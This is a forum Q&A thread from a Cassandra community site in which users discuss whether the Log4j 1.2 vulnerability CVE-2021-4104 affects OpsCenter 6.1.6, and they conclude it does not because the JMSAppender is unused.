Bringing together the Apache Cassandra experts from the community and DataStax.

Want to learn? Have a question? Want to share your expertise? You are in the right place!

Not sure where to begin? Getting Started

 

question

yun avatar image
yun asked Erick Ramirez answered

Is there any impact of the log4j vulnerability CVE-2021-4104 on OpsCenter ?

Hello All,

Is there any impact of the log4j vulnerability CVE-2021-4104 on Opscenter?

We are using Opscenter 6.1.6 and it has /usr/share/opscenter/lib/jvm/log4j-1.2.9.jar

opscentercve
10 |1000

Up to 8 attachments (including images) can be used with a maximum of 1.0 MiB each and 10.0 MiB total.

steve.lacerda avatar image
steve.lacerda answered yun commented

The CVE requires the JMSAppender, which neither Opscenterd nor the agents use. Thus, it is not affected by the vulnerability.

1 comment Share
10 |1000

Up to 8 attachments (including images) can be used with a maximum of 1.0 MiB each and 10.0 MiB total.

Thank you.

0 Likes 0 ·
Erick Ramirez avatar image
Erick Ramirez answered

As it states in CVE-2021-4104, Log4j 1.2 is vulnerable when an attacker gains access to modify the Log4j configuration file (log4j.properties). An attacker is able to execute arbitrary code IF they configure Log4j to use the JMSAppender and make it point to the attacker's own JNDI LDAP endpoint.

To be clear, Log4j is only vulnerable to this specific exploit with these two scenarios:

  1. Log4j is configured to use the JMSAppender.
  2. An attacker gained access to the server to modify configuration files.

OpsCenter is not exposed to scenario #1 because the agent is not configured to use this appender. If scenario #2 is true, then I would suggest that you have bigger problems than just OpsCenter because an attacker has penetrated your environment and circumvented your security measures.

Given that Log4j 1.x has reached it's end of life (EOL), it is being replaced in the next release of OpsCenter. Cheers!

Share
10 |1000

Up to 8 attachments (including images) can be used with a maximum of 1.0 MiB each and 10.0 MiB total.